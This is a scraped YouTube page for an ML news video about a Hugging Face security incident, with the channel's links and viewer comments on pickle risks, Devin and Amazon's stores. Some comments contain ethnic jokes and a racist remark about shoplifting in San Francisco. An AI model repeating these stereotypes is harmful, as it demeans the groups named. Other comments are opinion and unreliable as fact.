Hugging Face got hacked
Вставка
- Опубліковано 21 тра 2024
- Links:
Homepage: ykilcher.com
Merch: ykilcher.com/merch
UA-cam: / yannickilcher
Twitter: / ykilcher
Discord: ykilcher.com/discord
LinkedIn: / ykilcher
If you want to support me, the best thing to do is to share out the content :)
If you want to support me financially (completely optional and voluntary, but a lot of people have asked for this):
SubscribeStar: www.subscribestar.com/yannick...
Patreon: / yannickilcher
Bitcoin (BTC): bc1q49lsw3q325tr58ygf8sudx2dqfguclvngvy2cq
Ethereum (ETH): 0x7ad3513E3B8f66799f507Aa7874b1B0eBC7F85e2
Litecoin (LTC): LQW2TRyKYetVC8WjFkhpPhtpbDM4Vw7r9m
Monero (XMR): 4ACL8AGrEo5hAir8A9CeVrW8pEauWvnp1WnSDZxW7tziCDLhZAGsgzhRQABDnFy8yuM9fWJDviJPHKRjV4FWt19CJZN9D4n - Наука та технологія
Amazon believes AI stands for "Actually, Indians".
😂
I envision 7,000 Indian Managers worldwide working for Amazon who overlook all the robots etc. in the warehouses.
It's the new Domino's.
To be fair, if an AI is controlling an Indian, it is still AI at work.
Attentive Indians.
Artificial Indians
0:00 intro
0:09 Hugging Face Hacked
3:33 GPT-4 bar exam
5:10 Amzaon's Grocery Stores
6:44 delve
7:28 Devin's competition
11:12 lightning-thunder
11:45 gpt-author
13:26 Maestro
14:16 Tactics2D
14:50 LLaMA on CPUs
16:05 Microsoft Course
16:45 GGUF parser
17:40 farewell
Hi Yannic, If you copy this to the description, it will create timestamps. Format requirements - time first & must start from 0:00
The optimisation stuff is crazy. I remember not long after llama came out, i think it was Justine, pointed out that AI researchers using python were loading these massive tensors files and then processing them... Essentially doubling the memory use. And for 15gb files this was crazy. Thankfully operating system engineers had already solved this problem years ago. Mmap. You memory map a large file and the operating system kernel does all the hard work of making it seem like it's all loaded into sequential ram, including loading when needed and swapping it in and out when the ram is under pressure.
I wonder how much cpu and ram were wasted.
Again it's almost like we never learn. Lol.
Hm, memory map works when you need only a part of file at a moment. To produce an output, an LLM needs all the weights. Computations happen way faster than loading from storage for this to be efficient. Most of the time, CPU would wait for data.
It's crazy that hf didn't see a problem to execute arbitrary code from people in their servers.
Crazier that it took that long to be noticed
I see AI generated content working well in a 'choose your own adventure' kind of way. The actual writer or writers could build the world characters along with some high level generalizations of what goes on and the reader can work their way through it.
I started to write out how I'd implement it but I realized it would take too long, lots of potential.
Love it! Thanks for sharing all.
What happened to the reference links? They were very useful! - one of the (many) reasons I love your channel!
The irony that automatic software engineer projects would be looking for humans to contribute...
only the beginning of our future sub-API lifestyles 😅
Well, you have to help them help themselves and you until they can do better. It's like having a student who will become better than you at some point.
@@impolitevegan3179 It is not because all they can do is copy existing material, poorly. The theoretical reason is that they transformers have the computing capability of a regular expression (FSA), hoping that if only you can stuff more data into it the genius somehow will appear is like hoping for an elephant to become a giraffe if you pull long enough on its neck.
@@impolitevegan3179 That current systems become better software engineers than any human is something that I believe when I see it and literally not a second earlier.
@@clray123 That's the most misleading statement I've ever heard about transformers. _Any_ object that exists in the real world has a finite number of states and you can therefore theoretically model its behaviour with a finite-state machine. That doesn't keep us from calling humans or most normal computers Turing-complete and it shouldn't keep you from realising that LLMs can parse and generate type-0 languages.
Also, "copying" is an inadequate description of what transformers do. Of course anything they do, they base on their training data. So does your brain though.
So it's funny how you two have completely opposite points of view on generative AI and I think you're both wrong ;) Why is it so hard for people to talk and think about generative AI without being either of the opinion that it's basically AGI with a few kinks to be ironed out, or that it's complete trash and less useful than a calculator. Y'all _gotta_ see that the truth in somewhere in between, right?
5:10 I recalibrated my internal models such as those exams and are really useless for anything else besides telling how good you are at remembering stupid crap for exams
damn 3 news in the week.
It was a nice delve into ML news with you.
Thank you Justine
Hey Yannic, thank you for the video, awesome as always! PS do you usually have a list with links?
In Poland there is Żabka that is just walk out and works perfectly, only CV.
Devin was fraud
Humans accross domains typically become more efficent through many many itterations unless mathematical tools are used.
AI while not reletively new, it doesnt exactly have mathematical models made for doing things efficently yet.
So of course we are going to do it very inefficently.
Its similiar to how security is almost entirely none existant unless there is some tool that tells you you are doing it wrong.
These things are the case because the education and enviroment that teaches humans is not optimized very well. So you end up with very common holes in human understanding.
Where there are holes in the foundation you commonly see holes in the humans learning on top of that foundation.
Thanks Yannic
The links are missing :(
Excellent delve!
Sick burn on stock shrinkage lol. Same in ny I heard
Is your intro music an excerpt from a real song? It sounds badass
so i updated my biases now 😂
Pickle is almost as bad as the days when JavaScript used to save Json by actually saving JavaScript and when loading, you loaded and ran JavaScript.
It's almost like we never learn.
It depends on the use case. If you have some python script that generates and consumes its own data, then pickle is a good solution. The problem is that these things get used way beyond what they were intended for
That's why huggingface wrote safetensors...
It was just not invented for the purpose for which it was abused. It's not like the authors of Pickle did it by accident and then realized "oops, it can execute code", but the dumb Python-illiterate users who ignore the documentation are certainly an issue here.
@@neelsg It really doesn't depend on the use case. It's an absolutely disastrously stupid idea that is almost guaranteed to get you completely and easily pwned once the attacker is into your system initially. I mean, you don't just have one line of defence here.
@@winsomehaxI thought Pickle was supposed to be used when like,
running code one is writing oneself, in an explorative way, and one needs to like, restart Python or something (or reboot one’s computer).
Like, “unless you made the pickle file yourself, you shouldn’t unpack it”?
One word that I've been seeing over and over again lately is "moreover". It's a word that I don't remember ever seeing with any regularity, or, really, ever at all, in the past, but I see it constantly now. It will be nearly every day I see it used in an article I'm reading on the internet or something and I will stop and realize I'm probably consuming AI-generated content. It's pretty creepy honestly.
7:10, POE gamers rize up!
I like the fun news. Especially the amazon shop with human anotators for each purchase! 💡
Gpt4 that took the bar exam was the 32k. I work with the guy who wrote the paper lol
huggingface at its best
OMG! They juts hit 1 million models saved, what a news!
This is millions of times better than any AI video I’ve seen to date. No hype train, just facts
6:29 😂
I heard in California every store is a just walk out store
Buy me a sunglass.
Please put links in a description 😢
2:23 The fashionable cynical chuckle
6:40 haha what a jab at california
Hacking Face
7:06 I only know delve as the debugger for go
2018 lol
Computer hallucinates in a bar?
Fix huggin face bug demo in Devin?
I think Sayak Paul's twitter account has also been hacked, is that true? and why huggingface does nothing about this?
Very good but no good at all.
Wasn't devin demo fake?
devinitely
🤗 is not hacked
AI written fiction is very boring.
Tldr?
news
San Francisco has adopted the "just walk out" policy for anyone non-white who'd rather not have to pay money for goods. Apparently many businesses have also adopted the slogan in regards to San Francisco itself.
"hugging face got hacked" noooo wtf people , very disappointing